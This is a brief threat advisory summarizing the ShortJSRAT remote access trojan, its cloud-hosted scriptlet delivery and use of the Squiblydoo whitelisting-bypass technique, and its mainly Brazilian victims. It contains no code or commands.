ShortJSRAT is a remote access trojan (RAT) that uses cloud apps to deliver malicious Windows script component scriplet files that are appended with a .sct extension. Downloading and executing scriptlets hosted on cloud apps makes detection and remediation the attack more difficult. The cloud apps deliver the second stage payloads via the Squiblydoo technique that use native Windows applications to bypass application whitelisting solutions. Researchers discovered multiple variants of ShortJSRAT malware using the Squiblydoo technique. Currently, all affected systems are running the Windows operating system. ShortJSRAT has predominantly affected users in Brazil and current information suggests that the threat actors are based in Brazil. Other victims are located in the USA, India, Spain, and Germany, among others.

Technical Details

  • Netskope provides a technical analysis of ShortJSRAT here.